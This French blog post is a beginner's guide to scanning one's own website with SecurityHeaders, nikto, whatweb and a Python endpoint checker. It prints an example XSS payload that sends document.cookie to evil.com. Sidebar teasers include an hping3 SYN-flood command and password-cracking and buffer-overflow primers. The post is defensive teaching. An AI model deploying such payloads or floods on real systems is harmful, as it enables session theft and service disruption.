Accéder au contenu principal

🔐 Scanner son propre site web pour détecter les vulnérabilités : un guide complet pour débutants et curieux de cybersécurité

🧭 Pourquoi ce guide ?

Internet est une vitrine. Et comme toute vitrine, elle peut être brisée. Un site web non sécurisé peut être :

  • défiguré (defacement)
  • utilisé pour héberger du code malveillant
  • piraté pour voler des données utilisateurs
  • utilisé comme relais pour des campagnes de phishing

👉 Pourtant, 80 % des failles exploitées aujourd’hui sont connues et évitables.
Dans cet article, je vous montre comment scanner votre propre site pour détecter les vulnérabilités les plus courantes.

🚨 Exemples concrets d'attaques fréquentes

1. XSS (Cross-Site Scripting)

But : injecter du JavaScript malveillant dans une page web.

Exemple :

<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>

Résultat : vol de session, redirection ou infection.

2. Exposition de fichiers sensibles

But : accéder à des fichiers de config ou backups laissés en ligne.

Exemple : un fichier backup.zip oublié avec des mots de passe en clair.

3. Headers de sécurité manquants

But : pas de protection contre XSS, clickjacking, sniffing MIME, etc.

Exemple : sans X-Frame-Options, un attaquant peut piéger l’utilisateur via une iframe invisible.

🛠️ Prérequis pour scanner

  • Un site actif (le vôtre)
  • Un terminal (Windows, Linux, macOS)
  • Python 3 installé
  • Scanner uniquement ce que vous possédez !

1️⃣ Scanner les entêtes HTTP avec SecurityHeaders

Outil : https://securityheaders.com

  1. Accédez au site
  2. Saisissez votre URL
  3. Cliquez sur “Scan”

Résultat : vous voyez les entêtes manquants (CSP, HSTS, etc.)

2️⃣ Scanner avec nikto

Outil : nikto (CLI)

sudo apt install nikto -y
nikto -h https://votresite.com

Ce qu’il détecte : scripts obsolètes, fichiers publics oubliés, headers non sécurisés

3️⃣ Identifier les technos exposées avec whatweb

Outil : whatweb

sudo apt install whatweb -y
whatweb https://votresite.com

Ce qu’il révèle : CMS, versions, jQuery ou PHP anciens, serveurs backend exposés

4️⃣ Script Python : tester des endpoints sensibles

Script :

import requests

url = "https://votresite.com"
endpoints = ["/admin", "/config.php", "/.git/", "/backup.zip", "/phpinfo.php"]

for path in endpoints:
    r = requests.get(url + path)
    if r.status_code == 200:
        print(f"[ALERTE] Accessible : {url + path}")
    elif r.status_code == 403:
        print(f"[!] Interdit mais existant : {url + path}")
    else:
        print(f"[OK] {url + path} n'existe pas")

🎯 Que faire ensuite ?

  • Supprimer les fichiers exposés
  • Mettre en place HTTPS partout
  • Configurer les headers HTTP
  • Répéter ces scans régulièrement

🧠 À retenir

Menace Ce qui la déclenche Ce qui la bloque
XSS Entrées utilisateurs mal filtrées Sanitisation, CSP
Fichiers exposés Fichiers oubliés dans /public Audit, accès restreint
Vieilles bibliothèques Pas de mise à jour CDN sécurisé, maintenance
Headers manquants Pas de config serveur Outils comme SecurityHeaders

📌 Conclusion

Scanner son propre site permet de :

  • Protéger ses données
  • Réduire les risques d’exploitation
  • Respecter les standards de sécurité
  • Préparer son site à des monétisations comme AdSense

🛡️ Un site sécurisé inspire confiance.

Commentaires

Enregistrer un commentaire

Posts les plus consultés de ce blog

🔓 Peut-on vraiment "craquer" un mot de passe ? Une démonstration pas à pas 👇 Ce qu’on va faire Dans cet article, on montre concrètement comment un outil gratuit (présent dans Kali Linux) peut retrouver un mot de passe simple en quelques secondes. Mais on va aussi voir pourquoi un mot de passe complexe bloque toute attaque — et comprendre pourquoi. 🛠️ Les outils nécessaires On utilise un outil connu des experts cybersécurité : John the Ripper (inclus dans Kali Linux, utilisé pour les tests d’audit de mots de passe). John ne "pirate" pas un système en ligne. Il teste des mots de passe chiffrés en local , comme s’il avait volé un fichier de mots de passe (un hash). Cela simule ce qui se passe quand un hacker récupère une base de données de mots de passe cryptés . ✅ Étape 1 – Créer un mot de passe simple et le chiffrer On va créer un mot de passe : bonjour123 Puis on le chiffre avec cette commande : echo -n "bonjour123" | openssl passwd -...
Enregistrer un commentaire
Read more »
Comprendre les Buffer Overflows - Analyse Technique 🗂️ Table des matières 🧠 Introduction 📚 Comprendre la vulnérabilité 🛠️ Compilation sans protections 🔎 Mécanisme d'exploitation 🛡️ Protections modernes 🧰 Outils à connaître 🔧 Environnement Docker 📌 Rappel sur les registres : Lorsqu'une fonction est exécutée, plusieurs registres processeur sont utilisés. Parmi eux : RIP (x86_64) : registre d'instruction, contient l'adresse de la prochaine instruction à exécuter. EIP (x86 32-bit) : équivalent de RIP sur les systèmes 32 bits. RBP / EBP : pointeur de base de la pile, souvent utilisé pour référencer les variables locales et les arguments. RSP / ESP : pointeur de sommet de la pile, toujours à jour avec l'adresse actuelle du haut de pile. Ces registres sont au cœur des méca...
Enregistrer un commentaire
Read more »
Détection d'une attaque DDoS avec Snort et Kali Linux Mener une Attaque DDoS avec Kali Linux et la Détecter avec Snort Avertissement : ce tutoriel est destiné à un usage éthique et pédagogique dans un environnement de test. Toute utilisation non autorisée est interdite. 1. Objectif Simuler une attaque DDoS depuis Kali Linux et observer sa détection en temps réel par Snort. Cette approche est parfaite pour un exercice red/blue team. 2. Préparation de l'environnement Attaquant : Kali Linux Cible : Ubuntu Server avec Apache Snort IDS : sur une machine intermédiaire (interface en mode promiscuous) 3. Simulation d'une attaque DDoS 3.1 SYN Flood avec hping3 Le SYN flood sature les connexions TCP en enchaînant des paquets SYN sans finaliser le handshake. sudo hping3 -c 50000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.20 3.2 HTTP Flood avec GoldenEye GoldenEye provoque un déluge de requêtes HTT...
Enregistrer un commentaire
Read more »